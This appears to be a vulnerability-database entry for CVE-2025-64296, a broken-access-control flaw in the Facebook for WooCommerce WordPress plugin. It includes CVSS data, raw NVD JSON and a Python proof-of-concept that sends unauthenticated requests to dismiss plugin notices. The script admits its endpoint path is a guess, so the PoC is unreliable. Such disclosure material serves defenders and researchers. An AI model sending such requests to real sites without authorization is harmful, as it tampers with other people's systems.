Security Vulnerability Report
中文
CVE-2025-64296 CVSS 5.3 MEDIUM

CVE-2025-64296

Published: 2025-10-29 04:16:06
Last Modified: 2026-04-23 15:35:12

Description

Missing Authorization vulnerability in Facebook Facebook for WooCommerce facebook-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Facebook for WooCommerce: from n/a through <= 3.5.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

facebook-for-woocommerce <= 3.5.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-64296 PoC - Missing Authorization in Facebook for WooCommerce # Target: WordPress site with facebook-for-woocommerce plugin <= 3.5.7 target_url = "http://target-wordpress-site.com" # The vulnerable endpoint for notice dismissal # (Exact endpoint path needs to be identified from plugin source code) vulnerable_endpoint = f"{target_url}/wp-json/facebook-for-woocommerce/v1/notice/dismiss" def exploit_missing_authorization(): """ Exploit for CVE-2025-64296: Missing Authorization in notice dismissal This PoC demonstrates how an unauthenticated attacker can dismiss notices by making a direct request to the vulnerable API endpoint. """ headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Payload to dismiss notices without authentication payload = { 'notice_id': 'facebook-plugin-notice', 'dismiss': True } try: # Send unauthenticated request to vulnerable endpoint response = requests.post( vulnerable_endpoint, json=payload, headers=headers, timeout=10 ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: print("[+] Exploit successful - Notice dismissed without authorization") else: print("[-] Exploit failed or endpoint not vulnerable") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": exploit_missing_authorization()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64296", "sourceIdentifier": "[email protected]", "published": "2025-10-29T04:16:05.760", "lastModified": "2026-04-23T15:35:11.670", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Facebook Facebook for WooCommerce facebook-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Facebook for WooCommerce: from n/a through <= 3.5.7."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Facebook para WooCommerce permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Facebook para WooCommerce: desde n/a hasta 3.5.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/facebook-for-woocommerce/vulnerability/wordpress-facebook-for-woocommerce-plugin-3-5-7-broken-access-control-to-notice-dismissal-vulnerability?_s_id=cve", "source": "[email protected]"}]}}